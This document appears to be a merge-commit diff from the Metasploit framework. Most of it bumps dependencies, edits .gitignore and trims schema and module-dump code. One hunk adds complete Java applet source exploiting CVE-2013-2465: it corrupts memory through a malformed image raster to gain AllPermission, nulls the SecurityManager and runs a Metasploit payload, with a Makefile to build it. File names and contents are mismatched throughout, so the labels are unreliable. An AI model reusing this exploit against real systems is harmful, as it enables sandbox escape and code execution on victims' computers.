Merge remote-tracking branch 'upstream/master' into python-meterpreter-dev

Author: zeroSteiner

.gitignore

@@ -1,6 +1,8 @@
 .bundle
 # Rubymine project directory
 .idea
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
 # Portable ruby version files for rvm
 .ruby-gemset
 .ruby-version
@@ -40,3 +42,5 @@ tags
 *.orig
 *.rej
 *~
+# Ignore backups of retabbed files
+*.notab

Gemfile

@@ -17,7 +17,7 @@ group :db do
 	# Needed for Msf::DbManager
 	gem 'activerecord'
 	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.16.1'
+	gem 'metasploit_data_models', '~> 0.16.6'
 	# Needed for module caching in Mdm::ModuleDetails
 	gem 'pg', '>= 0.11'
 end

Gemfile.lock

@@ -23,7 +23,7 @@ GEM
     i18n (0.6.1)
     json (1.7.7)
     metaclass (0.0.1)
-    metasploit_data_models (0.16.1)
+    metasploit_data_models (0.16.6)
       activerecord (>= 3.2.13)
       activesupport
       pg
@@ -67,7 +67,7 @@ DEPENDENCIES
   database_cleaner
   factory_girl (>= 4.1.0)
   json
-  metasploit_data_models (~> 0.16.1)
+  metasploit_data_models (~> 0.16.6)
   msgpack
   network_interface (~> 0.0.1)
   nokogiri

data/exploits/CVE-2013-2465/Exploit$MyColorModel.class

@@ -11,38 +11,14 @@
 #
 # It's strongly recommended to check this file into your version control system.
 
-ActiveRecord::Schema.define(:version => 20130604145732) do
+ActiveRecord::Schema.define(:version => 20130717150737) do
 
   create_table "api_keys", :force => true do |t|
     t.text     "token"
     t.datetime "created_at", :null => false
     t.datetime "updated_at", :null => false
   end
 
-  create_table "attachments", :force => true do |t|
-    t.string  "name",         :limit => 512
-    t.binary  "data"
-    t.string  "content_type", :limit => 512
-    t.boolean "inline",                      :default => true,  :null => false
-    t.boolean "zip",                         :default => false, :null => false
-    t.integer "campaign_id"
-  end
-
-  create_table "attachments_email_templates", :id => false, :force => true do |t|
-    t.integer "attachment_id"
-    t.integer "email_template_id"
-  end
-
-  create_table "campaigns", :force => true do |t|
-    t.integer  "workspace_id",                               :null => false
-    t.string   "name",         :limit => 512
-    t.text     "prefs"
-    t.integer  "status",                      :default => 0
-    t.datetime "started_at"
-    t.datetime "created_at",                                 :null => false
-    t.datetime "updated_at",                                 :null => false
-  end
-
   create_table "clients", :force => true do |t|
     t.integer  "host_id"
     t.datetime "created_at"
@@ -65,24 +41,6 @@
     t.string   "source_type"
   end
 
-  create_table "email_addresses", :force => true do |t|
-    t.integer  "campaign_id",                                   :null => false
-    t.string   "first_name",  :limit => 512
-    t.string   "last_name",   :limit => 512
-    t.string   "address",     :limit => 512
-    t.boolean  "sent",                       :default => false, :null => false
-    t.datetime "clicked_at"
-  end
-
-  create_table "email_templates", :force => true do |t|
-    t.string  "name",        :limit => 512
-    t.string  "subject",     :limit => 1024
-    t.text    "body"
-    t.integer "parent_id"
-    t.integer "campaign_id"
-    t.text    "prefs"
-  end
-
   create_table "events", :force => true do |t|
     t.integer  "workspace_id"
     t.integer  "host_id"
@@ -581,22 +539,14 @@
   add_index "web_sites", ["options"], :name => "index_web_sites_on_options"
   add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost"
 
-  create_table "web_templates", :force => true do |t|
-    t.string  "name",        :limit => 512
-    t.string  "title",       :limit => 512
-    t.string  "body",        :limit => 524288
-    t.integer "campaign_id"
-    t.text    "prefs"
-  end
-
   create_table "web_vulns", :force => true do |t|
     t.integer  "web_site_id",                 :null => false
     t.datetime "created_at",                  :null => false
     t.datetime "updated_at",                  :null => false
     t.text     "path",                        :null => false
     t.string   "method",      :limit => 1024, :null => false
     t.text     "params",                      :null => false
-    t.text     "pname",                       :null => false
+    t.text     "pname"
     t.integer  "risk",                        :null => false
     t.string   "name",        :limit => 1024, :null => false
     t.text     "query"

data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class

@@ -0,0 +1,197 @@
+import java.awt.image.*;
+import java.awt.color.*;
+import java.beans.Statement;
+import java.security.*;
+import metasploit.Payload;
+import java.applet.Applet;
+
+public class Exploit extends Applet {
+
+    public void init() {
+
+        try {
+
+			// try several attempts to exploit
+			for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){
+				//System.out.println("Attempt #" + i);		
+				tryExpl();		
+			}
+
+			// check results
+			if (System.getSecurityManager() == null) {
+				// execute payload
+				//Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe");
+				Payload.main(null);
+			}		
+					
+        } catch (Exception ex) {
+            //ex.printStackTrace();
+        }
+    }
+	
+    public static String toHex(int i)
+	{
+        return Integer.toHexString(i);
+	}
+      
+    private boolean _is64  = System.getProperty("os.arch","").contains("64");
+   
+    // we will need ColorSpace which returns 1 from getNumComponents()
+    class MyColorSpace extends ICC_ColorSpace
+    {           
+        public MyColorSpace()
+        {           
+            super(ICC_Profile.getInstance(ColorSpace.CS_sRGB));
+        }
+        
+        // override getNumComponents
+        public int getNumComponents()
+        {
+            int res = 1;
+            return res;
+        }    
+    } 
+    
+    // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true. 
+    class MyColorModel extends ComponentColorModel
+    {   
+        public MyColorModel()
+        {
+            super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE);
+        }
+        
+        // override isCompatibleRaster
+        public boolean isCompatibleRaster(Raster r)
+		{
+			boolean res = true;
+			return res;
+		}
+    }
+        
+        
+    private int tryExpl() 
+    {                                      
+		try {
+            // alloc aux vars
+            String name = "setSecurityManager";
+            Object[] o1 = new Object[1];
+            Object o2 = new Statement(System.class, name, o1); // make a dummy call for init
+
+            // allocate byte buffer for destination Raster.
+            DataBufferByte dst = new DataBufferByte(16); 
+            
+            // allocate the target array right after dst
+            int[] a = new int[8];
+            // allocate an object array right after a[]
+            Object[] oo = new Object[7];
+
+            // create Statement with the restricted AccessControlContext
+            oo[2] = new Statement(System.class, name, o1);
+
+            // create powerful AccessControlContext
+            Permissions ps = new Permissions();
+            ps.add(new AllPermission());	
+            oo[3] = new AccessControlContext(
+                new ProtectionDomain[]{
+                    new ProtectionDomain(
+                        new CodeSource(
+                            new java.net.URL("file:///"), 
+                            new java.security.cert.Certificate[0] 
+                        ),
+                        ps
+                    )
+                }
+            );
+            
+            // store System.class pointer in oo[]
+            oo[4] = ((Statement)oo[2]).getTarget();	
+
+            // save old a.length
+            int oldLen = a.length;
+            //System.out.println("a.length = 0x" + toHex(oldLen));
+            
+            // create regular source image
+            BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB); 
+            
+            // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length
+            MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0));
+            // create malformed destination image based on dst[] data
+            WritableRaster wr = Raster.createWritableRaster(sm, dst, null);                      
+            BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null);
+        
+            // prepare first pixel which will overwrite a.length
+            bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1});            
+            
+            // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c)
+            AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
+            op.filter(bi1, bi2);         
+            
+            // check results: a.length should be overwritten by 0xFFFFFFFF
+            int len = a.length;
+            //System.out.println("a.length = 0x" + toHex(len)); 
+            if (len == oldLen) { 
+                // check a[] content corruption // for RnD
+                for(int i=0; i < len; i++) { 
+					if (a[i] != 0) { 
+						//System.out.println("a["+i+"] = 0x" + toHex(a[i]));
+					}
+				}  
+                // exit
+                //System.out.println("error 1"); 
+                return 1; 
+            }
+			
+            // ok, now we can read/write outside the real a[] storage,
+            // lets find our Statement object and replace its private "acc" field value
+            
+            // search for oo[] after a[oldLen]
+            boolean found = false;
+            int ooLen = oo.length;
+            for(int i=oldLen+2; i < oldLen+32; i++)
+                if (a[i-1]==ooLen && a[i]==0 && a[i+1]==0 // oo[0]==null && oo[1]==null
+                 && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0   // oo[2,3,4] != null    
+                 && a[i+5]==0 && a[i+6]==0)               // oo[5,6] == null
+                {
+                    // read pointer from oo[4]
+                    int stmTrg = a[i+4];
+                    // search for the Statement.target field behind oo[]
+                    for(int j=i+7; j < i+7+64; j++){
+                        if (a[j] == stmTrg) {
+                            // overwrite default Statement.acc by oo[3] ("AllPermission")
+                            a[j-1] = a[i+3];
+                            found = true;
+                            break;
+                        }
+                    }
+                    if (found) break;
+                }
+
+            // check results 
+            if (!found) {
+                // print the memory dump on error // for RnD
+                String s = "a["+oldLen+"...] = ";
+                for(int i=oldLen; i < oldLen+32; i++) s += toHex(a[i]) + ",";
+                //System.out.println(s);
+            } else try {
+
+                // call System.setSecurityManager(null)
+                ((Statement)oo[2]).execute();	
+
+                // show results: SecurityManager should be null
+            } catch (Exception ex) {
+                //ex.printStackTrace();
+            } 
+            
+            //System.out.println(System.getSecurityManager() == null ? "Ok.":"Fail.");
+	           
+		} catch (Exception ex) {
+			//ex.printStackTrace();
+		}	
+        
+        return 0;
+    }
+
+}
+
+
+

data/exploits/CVE-2013-2465/Exploit.class

@@ -0,0 +1,14 @@
+CLASSES = Exploit.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" Exploit.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv *.class ../../../../data/exploits/CVE-2013-3465/
+
+clean:
+	rm -rf *.class
+

db/schema.rb

@@ -123,7 +123,6 @@ def self.dump_exploit_module(mod, indent = '')
 		output  = "\n"
 		output << "       Name: #{mod.name}\n"
 		output << "     Module: #{mod.fullname}\n"
-		output << "    Version: #{mod.version}\n"
 		output << "   Platform: #{mod.platform_to_s}\n"
 		output << " Privileged: " + (mod.privileged? ? "Yes" : "No") + "\n"
 		output << "    License: #{mod.license}\n"
@@ -179,7 +178,6 @@ def self.dump_auxiliary_module(mod, indent = '')
 		output  = "\n"
 		output << "       Name: #{mod.name}\n"
 		output << "     Module: #{mod.fullname}\n"
-		output << "    Version: #{mod.version}\n"
 		output << "    License: #{mod.license}\n"
 		output << "       Rank: #{mod.rank_to_s.capitalize}\n"
 		output << "\n"
@@ -217,7 +215,6 @@ def self.dump_payload_module(mod, indent = '')
 		output  = "\n"
 		output << "       Name: #{mod.name}\n"
 		output << "     Module: #{mod.fullname}\n"
-		output << "    Version: #{mod.version}\n"
 		output << "   Platform: #{mod.platform_to_s}\n"
 		output << "       Arch: #{mod.arch_to_s}\n"
 		output << "Needs Admin: " + (mod.privileged? ? "Yes" : "No") + "\n"
@@ -255,7 +252,6 @@ def self.dump_basic_module(mod, indent = '')
 		output  = "\n"
 		output << "       Name: #{mod.name}\n"
 		output << "     Module: #{mod.fullname}\n"
-		output << "    Version: #{mod.version}\n"
 		output << "   Platform: #{mod.platform_to_s}\n"
 		output << "       Arch: #{mod.arch_to_s}\n"
 		output << "       Rank: #{mod.rank_to_s.capitalize}\n"